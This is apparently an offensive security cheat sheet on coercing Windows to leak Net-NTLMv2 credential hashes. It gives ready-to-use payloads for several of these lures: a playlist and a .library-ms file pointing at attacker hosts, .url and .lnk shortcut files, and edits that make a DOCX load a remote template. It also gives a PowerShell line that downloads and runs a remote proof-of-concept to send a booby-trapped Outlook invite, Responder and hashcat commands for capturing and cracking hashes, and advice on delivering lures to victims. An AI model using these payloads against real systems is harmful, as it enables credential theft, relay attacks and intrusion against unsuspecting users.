Places to steal NTLM creds

Reading time: 7 minutes

Check all the great ideas from https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ from the download of a microsoft word file online to the ntlm leaks source: https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md and https://github.com/p0dalirius/windows-coerced-authentication-methods

Windows Media Player playlists (.ASX/.WAX)

If you can get a target to open or preview a Windows Media Player playlist you control, you can leak Net‑NTLMv2 by pointing the entry to a UNC path. WMP will attempt to fetch the referenced media over SMB and will authenticate implicitly.

Example payload:

<asx version="3.0">
  <title>Leak</title>
  <entry>
    <title></title>
    <ref href="file://ATTACKER_IP\\share\\track.mp3" />
  </entry>
</asx>

Collection and cracking flow:

# Capture the authentication
sudo Responder -I <iface>

# Crack the captured NetNTLMv2
hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt

ZIP-embedded .library-ms NTLM leak (CVE-2025-24071/24055)

Windows Explorer insecurely handles .library-ms files when they are opened directly from within a ZIP archive. If the library definition points to a remote UNC path (e.g., \attacker\share), simply browsing/launching the .library-ms inside the ZIP causes Explorer to enumerate the UNC and emit NTLM authentication to the attacker. This yields a NetNTLMv2 that can be cracked offline or potentially relayed.

Minimal .library-ms pointing to an attacker UNC

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <version>6</version>
  <name>Company Documents</name>
  <isLibraryPinned>false</isLibraryPinned>
  <iconReference>shell32.dll,-235</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\10.10.14.2\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

Operational steps

• Create the .library-ms file with the XML above (set your IP/hostname).
• Zip it (on Windows: Send to → Compressed (zipped) folder) and deliver the ZIP to the target.
• Run an NTLM capture listener and wait for the victim to open the .library-ms from inside the ZIP.

Outlook calendar reminder sound path (CVE-2023-23397) – zero‑click Net‑NTLMv2 leak

Microsoft Outlook for Windows processed the extended MAPI property PidLidReminderFileParameter in calendar items. If that property points to a UNC path (e.g., \attacker\share\alert.wav), Outlook would contact the SMB share when the reminder fires, leaking the user’s Net‑NTLMv2 without any click. This was patched on March 14, 2023, but it’s still highly relevant for legacy/untouched fleets and for historical incident response.

Quick exploitation with PowerShell (Outlook COM):

# Run on a host with Outlook installed and a configured mailbox
IEX (iwr -UseBasicParsing https://raw.githubusercontent.com/api0cradle/CVE-2023-23397-POC-Powershell/main/CVE-2023-23397.ps1)
Send-CalendarNTLMLeak -recipient user@example.com -remotefilepath "\\10.10.14.2\share\alert.wav" -meetingsubject "Update" -meetingbody "Please accept"
# Variants supported by the PoC include \\host@80\file.wav and \\host@SSL@443\file.wav

Listener side:

sudo responder -I eth0  # or impacket-smbserver to observe connections

Notes

• A victim only needs Outlook for Windows running when the reminder triggers.
• The leak yields Net‑NTLMv2 suitable for offline cracking or relay (not pass‑the‑hash).

.LNK/.URL icon-based zero‑click NTLM leak (CVE‑2025‑50154 – bypass of CVE‑2025‑24054)

Windows Explorer renders shortcut icons automatically. Recent research showed that even after Microsoft’s April 2025 patch for UNC‑icon shortcuts, it was still possible to trigger NTLM authentication with no clicks by hosting the shortcut target on a UNC path and keeping the icon local (patch bypass assigned CVE‑2025‑50154). Merely viewing the folder causes Explorer to retrieve metadata from the remote target, emitting NTLM to the attacker SMB server.

Minimal Internet Shortcut payload (.url):

[InternetShortcut]
URL=http://intranet
IconFile=\\10.10.14.2\share\icon.ico
IconIndex=0

Program Shortcut payload (.lnk) via PowerShell:

$lnk = "$env:USERPROFILE\Desktop\lab.lnk"
$w = New-Object -ComObject WScript.Shell
$sc = $w.CreateShortcut($lnk)
$sc.TargetPath = "\\10.10.14.2\share\payload.exe"  # remote UNC target
$sc.IconLocation = "C:\\Windows\\System32\\SHELL32.dll" # local icon to bypass UNC-icon checks
$sc.Save()

Delivery ideas

• Drop the shortcut in a ZIP and get the victim to browse it.
• Place the shortcut on a writable share the victim will open.
• Combine with other lure files in the same folder so Explorer previews the items.

Office remote template injection (.docx/.dotm) to coerce NTLM

Office documents can reference an external template. If you set the attached template to a UNC path, opening the document will authenticate to SMB.

Minimal DOCX relationship changes (inside word/):

1. Edit word/settings.xml and add the attached template reference:

<w:attachedTemplate r:id="rId1337" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"/>

2. Edit word/_rels/settings.xml.rels and point rId1337 to your UNC:

<Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="\\\\10.10.14.2\\share\\template.dotm" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>

3. Repack to .docx and deliver. Run your SMB capture listener and wait for the open.

For post-capture ideas on relaying or abusing NTLM, check:

HackTricks

References

• HTB Fluffy – ZIP .library‑ms auth leak (CVE‑2025‑24071/24055) → GenericWrite → AD CS ESC16 to DA (0xdf)
• HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM
• Morphisec – 5 NTLM vulnerabilities: Unpatched privilege escalation threats in Microsoft
• MSRC – Microsoft mitigates Outlook EoP (CVE‑2023‑23397) and explains the NTLM leak via PidLidReminderFileParameter
• Cymulate – Zero‑click, one NTLM: Microsoft security patch bypass (CVE‑2025‑50154)